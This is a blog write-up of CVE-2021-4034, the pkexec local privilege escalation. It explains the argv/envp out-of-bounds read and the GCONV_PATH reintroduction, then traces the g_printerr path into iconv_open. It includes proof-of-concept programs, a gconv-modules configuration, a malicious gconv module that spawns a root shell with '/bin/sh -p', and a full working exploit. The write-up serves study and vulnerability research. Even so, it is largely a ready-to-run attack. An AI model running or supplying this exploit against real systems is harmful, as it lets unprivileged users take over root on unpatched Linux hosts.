CVE-2021-4034 Write-up

2022-02-18

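Preface

A while back I saw someone on Twitter mention this CVE: pkexec has a vulnerability that lets an attacker escalate privileges to root, and this SUID program is installed by default on many Linux distros. After reading the write-up on seclists, I thought the bug was really cool. What struck me most is that I had never seen a bug like it, and it was also the first time I had seen this kind of exploitation technique. So I decided on the spot that I would try writing an exploit for this CVE, with one restriction: I could only consult the article mentioned above. Here is how it went!

Of course, if anything in this post is wrong, I would be grateful for corrections <(_ _)>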

Vulnerability

  • The root cause is explained very clearly in the seclists article; this section mostly follows it
  • Here is the source code before the patch:
    int
    main (int argc, char *argv[])
    {
      guint n;
      gchar *path;
      gchar *s;
      ...
      for (n = 1; n < (guint) argc; n++)
      {
          // parse the various options
          ...
      }
      g_assert (argv[argc] == NULL);
      path = g_strdup (argv[n]);
      if (path[0] != '/')
      {
          s = g_find_program_in_path (path);
          if (s == NULL)
          {
              g_printerr ("Cannot run program %s: %s\n", path, strerror (ENOENT));
              goto out;
          }
          ...
          argv[n] = path = s;
      }
    }
    
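  • This part of the code treats argv[n] as path. n starts at 1, and when no arguments are passed the loop body never runs, so n is still 1 afterwards
  • A program's argv is normally laid out like this: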
    argv = {"/path/to/binary", "-option", "option_value", NULL}
    
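  • For more on argv, see the description in 你所不知道的 C 語言: 執行階段程式庫 (CRT)
  • argv has other clever uses too, busybox for example. On many embedded systems, if you run ls -al /bin, you will very likely find that a pile of common programs such as ls are just links pointing to busybox. In that case argv[0] is the name of the link (ls), and busybox decides internally which program to run based on argv[0]
  • That was some background on argv, but nothing forces a caller to pass argv this way
  • Suppose we run the following program: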
    int main()
    {
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, NULL);
    }
    
  • In this case argv will be:
    argv = { NULL }
    
  • argv[1] is then out of bounds for the argv array. The next question is: what comes right after argv? It is envp
  • In other words, in this situation argv[1] is the same as envp[0]!

Exploitation idea

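  • Since pkexec is a SUID program, achieving arbitrary code execution inside it amounts to privilege escalation
  • Because it is a SUID program, many environment variables that could lead to arbitrary execution are filtered out by ld.so first. Take LD_PRELOAD, which lets us choose a shared object to load. In a parallel universe where such variables were not filtered, we could write our own so, point the SUID program's LD_PRELOAD at it, and have the SUID program run whatever code we like, which is privilege escalation. In short, environment variables are a risk factor for any SUID program
  • Now look at the source code again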
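  • Suppose the argv we pass in contains nothing but a NULL
    path = g_strdup (argv[n]);
  • n is 1, so path is set to argv[1], which is envp[0]
  • s is the absolute path found for path, and this lookup uses the PATH environment variable. If PATH=/bin and path=ls, s ends up as /bin/ls (assuming /bin/ls exists, of course)
  • Then argv[n] = path = s writes the resolved absolute path s back into argv[1], that is, back into envp[0], so an environment variable has been modified
  • Now set envp[0] to value, set another environment variable PATH=name=., and create the file name=./value
  • After the lookup, s becomes name=./value
  • envp[0] is set to name=./value
  • Even though some dangerous environment variables were filtered at load time, we can now bypass that filtering: just substitute the name and value we want, and we can set any dangerous environment variable!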

argv[1] == envp[0]?

  • First, let's verify this claim:
    int main()
    {
      char* envp[] = {"yoyodiy",           // <Env value>
                      NULL};
    
      printf("[*] GoGo!\n");
    
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, envp);
    }
    
  • In the output, pkexec prints Cannot run program yoyodiy, because path is taken from argv[1], that is, from envp[0]

Which environment variable?

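  • The seclists article notes that the g_printerr() call in GLib (not glibc) may perform a CODESET conversion, which involves iconv_open(). The location of that function's configuration file is determined by the GCONV_PATH environment variable. The article then covers the rest in a single sentence: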

    Unfortunately, CVE-2021-4034 allows us to re-introduce GCONV_PATH into pkexec’s environment, and to execute our own shared library, as root.

  • Judging from the article, GCONV_PATH is the variable to use. But will it get filtered out? See Character Set Handling:

    The GNU C library implementation of iconv_open has one significant extension to other implementations. To ease the extension of the set of available conversions the implementation allows storing the necessary files with data and code in arbitrarily many directories. How this extension has to be written will be explained below (see section The iconv Implementation in the GNU C library). Here it is only important to say that all directories mentioned in the GCONV_PATH environment variable are considered if they contain a file gconv-modules. These directories need not necessarily be created by the system administrator. In fact, this extension is introduced to help users writing and using their own, new conversions. Of course this does not work for security reasons in SUID binaries; in this case only the system directory is considered and this normally is prefix/lib/gconv. The GCONV_PATH environment variable is examined exactly once at the first call of the iconv_open function. Later modifications of the variable have no effect.

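  • If a directory listed in GCONV_PATH contains gconv-modules, that configuration file is used, and it appears to control which library implements each CHARSET conversion
  • Let's verify this first. As for how: reading a file means there must be a syscall that opens it, so let's watch with strace: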
    int main()
    {
      char* envp[] = {"yoyodiy",           // <Env value>
                      "PATH=GCONV_PATH=.", // PATH=<Env name>=.
                      "SHELL=/yoyo/sh",    // Trigger g_printerr
                      NULL};
    
      printf("[*] GoGo!\n");
    
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, envp);
    
      // Never return
      printf("You should not be here!\n");
    }
    
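  • First, a walk through the poc code
  • With envp[0] = yoyodiy and PATH=GCONV_PATH=., triggering the bug sets envp[0] = GCONV_PATH=./yoyodiy
  • For the bug to trigger, the path lookup has to succeed, so we must prepare a directory named GCONV_PATH=. beforehand and put a file named yoyodiy inside it
  • Then, as the article says, reaching g_printerr() causes a CODESET conversion, which is what makes it read the configuration file
  • To see how to reach g_printerr(), look at the following source code: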
    /* now save the environment variables we care about */
    saved_env = g_ptr_array_new ();
    for (n = 0; environment_variables_to_save[n] != NULL; n++)
    {
      const gchar *key = environment_variables_to_save[n];
      const gchar *value;
    
      value = g_getenv (key);
      if (value == NULL)
          continue;
    
      /* To qualify for the paranoia goldstar - we validate the value of each
       * environment variable passed through - this is to attempt to avoid
       * exploits in (potentially broken) programs launched via pkexec(1).
       */
      if (!validate_environment_variable (key, value))
          goto out;
    
      g_ptr_array_add (saved_env, g_strdup (key));
      g_ptr_array_add (saved_env, g_strdup (value));
    }
    
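  • environment_variables_to_save is a list of environment variable names, and it includes SHELL
  • When the SHELL environment variable is set, its value is fetched and passed to validate_environment_variable() to be validated
  • validate_environment_variable():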
    /* special case $SHELL */
    if (g_strcmp0 (key, "SHELL") == 0)
    {
      /* check if it's in /etc/shells */
      if (!is_valid_shell (value))
      {
          log_message (LOG_CRIT, TRUE,
                       "The value for the SHELL variable was not found the /etc/shells file");
          g_printerr ("\n"
                      "This incident has been reported.\n");
          goto out;
      }
    }
    
  • If the SHELL value is not listed in /etc/shells, execution reaches g_printerr()
  • Next, run: sudo sh -c "strace ./poc > log 2>&1"
  • Part of the log:
    getcwd("/home/pt/CVE-2021-4034", 4096)  = 23
    openat(AT_FDCWD, "/home/pt/CVE-2021-4034/./yoyodiy/gconv-modules", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules", O_RDONLY|O_CLOEXEC) = 4
    fstat(4, {st_mode=S_IFREG|0644, st_size=56353, ...}) = 0
    read(4, "# GNU libc iconv configuration.\n"..., 4096) = 4096
    read(4, "B1002//\tJUS_I.B1.002//\nmodule\tJU"..., 4096) = 4096
    read(4, "\tISO-IR-110//\t\tISO-8859-4//\nalia"..., 4096) = 4096
    read(4, "\t\t\tISO-8859-14//\nalias\tISO_8859-"..., 4096) = 4096
    read(4, "DIC-ES//\nalias\tEBCDICES//\t\tEBCDI"..., 4096) = 4096
    read(4, "CDIC-CP-ES//\t\tIBM284//\nalias\tCSI"..., 4096) = 4096
    read(4, "\t\tIBM863//\nalias\tOSF1002035F//\t\t"..., 4096) = 4096
    brk(0x55735afa6000)                     = 0x55735afa6000
    read(4, "937//\t\tIBM937//\nmodule\tIBM937//\t"..., 4096) = 4096
    read(4, "UJIS//\t\t\tEUC-JP//\nmodule\tEUC-JP/"..., 4096) = 4096
    read(4, "lias\tISO2022CN//\t\tISO-2022-CN//\n"..., 4096) = 4096
    read(4, "O_5427-EXT//\nalias\tISO_5427EXT//"..., 4096) = 4096
    read(4, "ost\nmodule\tMAC-SAMI//\t\tINTERNAL\t"..., 4096) = 4096
    read(4, "112//\t\tINTERNAL\t\tIBM1112\t\t1\nmodu"..., 4096) = 4096
    read(4, "s\tCP9448//\t\tIBM9448//\nalias\tCSIB"..., 4096) = 3105
    read(4, "", 4096)                       = 0
    
  • We can see that it does try to open /home/pt/CVE-2021-4034/./yoyodiy/gconv-modules. The next question is how to write gconv-modules

gconv-modules

  • See section 6.5.4.1 Format of gconv-modules files in the manual
  • A simple configuration looks like this:
    module  ISO-2022-JP//   EUC-JP//        ISO2022JP-EUCJP    1
    
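  • The first field says what kind of entry this is, either alias or module. The fields of a module entry are described next
  • The second field is from
  • The third field is to
  • The fourth field is the loadable module
  • The fifth field is the cost
  • When iconv_open(const char *tocode, const char *fromcode) (man page) is called, this configuration is used to find the matching loadable module, which then does the CODESET conversion
  • How to write a loadable module is also covered in the manual, in 6.5.4.4 iconv module interfaces
  • It needs to export the following three functions: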
    • gconv_init
    • gconv_end
    • gconv
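  • The next question: does the program really call iconv_open()? Checking directly with sudo gdb poc shows that it does
  • The conversion goes from UTF-8 to ANSI_X3.4-1968, so we can write the following config:
    #         from       to                  module    cost
    module    UTF-8//    ANSI_X3.4-1968//    wtf       1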
  • The conversion will then use our wtf module, which looks like this:
int gconv_init (void *_)
{
    // -p priv  Do not attempt to reset effective uid if it does not match uid. This is not set by
    //          default to help avoid incorrect usage by setuid root programs via system(3) or
    //          popen(3).
    char *argv[] = {"/bin/sh", "-p", NULL};
    puts("[*] Run arbitrary shared library");
    setenv("PATH", "/bin:/usr/bin", 1);
    execve("/bin/sh", argv, NULL);
}

void gconv_end (void *data)
{
}

int gconv (void)
{
    return 0;
}
  • And with that we get a shell!
  • One additional note: at first I only wrote gconv_init(), and it failed. The reason is in the source code:
/* Open the gconv database if necessary.  A non-negative return value
   means success.  */
struct __gconv_loaded_object *
__gconv_find_shlib (const char *name)
{
    ...
    /* Try to load the shared object if the usage count is 0.  This
       implies that if the shared object is not loadable, the handle is
       NULL and the usage count > 0.  */
    if (found != NULL)
    {
        if (found->counter < -TRIES_BEFORE_UNLOAD)
        {
            assert (found->handle == NULL);
            found->handle = __libc_dlopen (found->name);
            if (found->handle != NULL)
            {
                found->fct = __libc_dlsym (found->handle, "gconv");
                if (found->fct == NULL)
                {
                    /* Argh, no conversion function.  There is something
                               wrong here.  */
                    __gconv_release_shlib (found);
                    found = NULL;
                }
                else
                {
                    found->init_fct = __libc_dlsym (found->handle, "gconv_init");
                    found->end_fct = __libc_dlsym (found->handle, "gconv_end");

#ifdef PTR_MANGLE
                    PTR_MANGLE (found->fct);
                    PTR_MANGLE (found->init_fct);
                    PTR_MANGLE (found->end_fct);
#endif

                    /* We have succeeded in loading the shared object.  */
                    found->counter = 1;
                }
            }
        else
            ...
    }
    else if (found->handle != NULL)
        ...
    }

  return found;
}
  • As shown, if gconv is missing, execution goes to __gconv_release_shlib() and the load fails

g_printerr()

  • Along the way I looked into why g_printerr() triggers iconv_open(). Here is how I traced it
  • g_printerr()
/**
 * g_printerr:
 * @format: the message format. See the printf() documentation
 * @...: the parameters to insert into the format string
 *
 * Outputs a formatted message via the error message handler.
 * The default handler simply outputs the message to stderr, without appending
 * a trailing new-line character. Typically, @format should end with its own
 * new-line character.
 *
 * g_printerr() should not be used from within libraries.
 * Instead g_log() or g_log_structured() should be used, or the convenience
 * macros g_message(), g_warning() and g_error().
 */
void
g_printerr (const gchar *format,
            ...)
{
  va_list args;
  gchar *string;
  GPrintFunc local_glib_printerr_func;

  g_return_if_fail (format != NULL);

  va_start (args, format);
  string = g_strdup_vprintf (format, args);
  va_end (args);

  g_mutex_lock (&g_messages_lock);
  local_glib_printerr_func = glib_printerr_func;
  g_mutex_unlock (&g_messages_lock);

  if (local_glib_printerr_func)
    local_glib_printerr_func (string);
  else
    {
      const gchar *charset;

      if (g_get_console_charset (&charset))
        fputs (string, stderr); /* charset is UTF-8 already */
      else
        {
          gchar *lstring = strdup_convert (string, charset);

          fputs (lstring, stderr);
          g_free (lstring);
        }
      fflush (stderr);
    }
  g_free (string);
}
/**
 * g_get_console_charset:
 * @charset: (out) (optional) (transfer none): return location for character set
 *   name, or %NULL.
 *
 * Obtains the character set used by the console attached to the process,
 * which is suitable for printing output to the terminal.
 *
 * Usually this matches the result returned by g_get_charset(), but in
 * environments where the locale's character set does not match the encoding
 * of the console this function tries to guess a more suitable value instead.
 *
 * On Windows the character set returned by this function is the
 * output code page used by the console associated with the calling process.
 * If the codepage can't be determined (for example because there is no
 * console attached) UTF-8 is assumed.
 *
 * The return value is %TRUE if the locale's encoding is UTF-8, in that
 * case you can perhaps avoid calling g_convert().
 *
 * The string returned in @charset is not allocated, and should not be
 * freed.
 *
 * Returns: %TRUE if the returned charset is UTF-8
 *
 * Since: 2.62
 */
gboolean
g_get_console_charset (const char **charset)
{
#ifdef G_OS_WIN32
    ...
#else
  /* assume the locale settings match the console encoding on non-Windows OSs */
  return g_get_charset (charset);
#endif
}
/**
 * g_get_charset:
 * @charset: (out) (optional) (transfer none): return location for character set
 *   name, or %NULL.
 *
 * Obtains the character set for the [current locale][setlocale]; you
 * might use this character set as an argument to g_convert(), to convert
 * from the current locale's encoding to some other encoding. (Frequently
 * g_locale_to_utf8() and g_locale_from_utf8() are nice shortcuts, though.)
 *
 * On Windows the character set returned by this function is the
 * so-called system default ANSI code-page. That is the character set
 * used by the "narrow" versions of C library and Win32 functions that
 * handle file names. It might be different from the character set
 * used by the C library's current locale.
 *
 * On Linux, the character set is found by consulting nl_langinfo() if
 * available. If not, the environment variables `LC_ALL`, `LC_CTYPE`, `LANG`
 * and `CHARSET` are queried in order.
 *
 * The return value is %TRUE if the locale's encoding is UTF-8, in that
 * case you can perhaps avoid calling g_convert().
 *
 * The string returned in @charset is not allocated, and should not be
 * freed.
 *
 * Returns: %TRUE if the returned charset is UTF-8
 */
gboolean
g_get_charset (const char **charset)
{
  static GPrivate cache_private = G_PRIVATE_INIT (charset_cache_free);
  GCharsetCache *cache = g_private_get (&cache_private);
  const gchar *raw;

  if (!cache)
    cache = g_private_set_alloc0 (&cache_private, sizeof (GCharsetCache));

  G_LOCK (aliases);
  raw = _g_locale_charset_raw ();
  G_UNLOCK (aliases);

  if (cache->raw == NULL || strcmp (cache->raw, raw) != 0)
    {
      const gchar *new_charset;

      g_free (cache->raw);
      g_free (cache->charset);
      cache->raw = g_strdup (raw);
      cache->is_utf8 = g_utf8_get_charset_internal (raw, &new_charset);
      cache->charset = g_strdup (new_charset);
    }

  if (charset)
    *charset = cache->charset;

  return cache->is_utf8;
}
/* Determine the current locale's character encoding, and canonicalize it
   into one of the canonical names listed in config.charset.
   The result must not be freed; it is statically allocated.
   If the canonical name cannot be determined, the result is a non-canonical
   name.  */

const char *
_g_locale_charset_raw (void)
{
  const char *codeset;

#if !(defined WIN32_NATIVE || defined OS2)

# if HAVE_LANGINFO_CODESET
/* Most systems support nl_langinfo (CODESET) nowadays.  */
  codeset = nl_langinfo (CODESET);
#  ifdef __CYGWIN__
    ...
#  endif

# else
    ...
# endif

#elif defined WIN32_NATIVE
    ...
#elif defined OS2
    ...
#endif

  return codeset;
}
  • codeset comes from nl_langinfo (CODESET)
  • See the nl_langinfo man page:

    CODESET (LC_CTYPE) Return a string with the name of the character encoding used in the selected locale, such as “UTF-8”, “ISO-8859-1”, or “ANSI_X3.4-1968” (better known as US-ASCII). This is the same string that you get with “locale charmap”. For a list of character encoding names, try “locale -m” (see locale(1)).

  • The man page names three example CODESETs: UTF-8, ISO-8859-1, and ANSI_X3.4-1968
  • Not every locale is available on a given system. To see which ones are, use locale -a
    ➜  ~ locale -a
    C
    C.UTF-8
    da_DK
    da_DK.iso88591
    danish
    en_AG
    en_AG.utf8
    en_AU.utf8
    en_BW.utf8
    en_CA.utf8
    en_DK.utf8
    en_GB.utf8
    en_HK.utf8
    en_IE.utf8
    en_IL
    en_IL.utf8
    en_IN
    en_IN.utf8
    en_NG
    en_NG.utf8
    en_NZ.utf8
    en_PH.utf8
    en_SG.utf8
    en_US.utf8
    en_ZA.utf8
    en_ZM
    en_ZM.utf8
    en_ZW.utf8
    es_SV.utf8
    POSIX
    
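  • da_DK in this list was generated separately with locale-gen, a command that requires privileges
  • For locales such as C that carry no .utf8 or .iso88591 suffix, the default CODESET is ANSI_X3.4-1968. For example, run the following program: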
    #include <langinfo.h>
    #include <locale.h>
    #include <stdio.h>

    int main(int argc, char *argv[])
    {
        setlocale(LC_ALL, "C");

        printf("%s\n", nl_langinfo(CODESET));
        return 0;
    }
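  • It prints ANSI_X3.4-1968
  • Coming back: execution reaches strdup_convert. The default charset is UTF-8, and this function tries to convert the string to the charset obtained earlier, ANSI_X3.4-1968
  • To guarantee that the CODESET conversion happens, the exploit can set the locale explicitly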

Full exploit code

  • The final exploit looks like this:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <langinfo.h>
#include <locale.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>

int main()
{
    struct stat st = {0};
    char* envp[] = {"yoyodiy",           // <Env value>
                    "PATH=GCONV_PATH=.", // PATH=<Env name>=.
                    "SHELL=/yoyo/sh",    // Trigger g_printerr
                    NULL};

    setlocale(LC_ALL, "C");

    printf("[*] Create GCONV_PATH=./yoyodiy\n");

    if (stat("GCONV_PATH=.", &st) == -1) {
        if (mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IRWXO) == -1) {
            printf("Cannot create directory: %s\n", strerror(errno));
            return 1;
        }
    }

    if (stat("GCONV_PATH=./yoyodiy", &st) == -1) {
        int fd = open("GCONV_PATH=./yoyodiy", O_WRONLY | O_APPEND | O_CREAT, 0755);
        if (fd == -1) {
            printf("Cannot create file: %s\n", strerror(errno));
            return 1;
        }
        close(fd);
    }

    printf("[*] GoGo!\n");

    // It will try to open <GCONV_PATH>/gconv-modules
    // --> ./<Env value>/gconv-modules

    // execve
    syscall(0x3b, "/usr/bin/pkexec", NULL, envp);

    // Never return
    printf("You should not be here!\n");
}
  • A yoyodiy directory must also be prepared, containing…
    • gconv-modules
    • wtf.so

Reference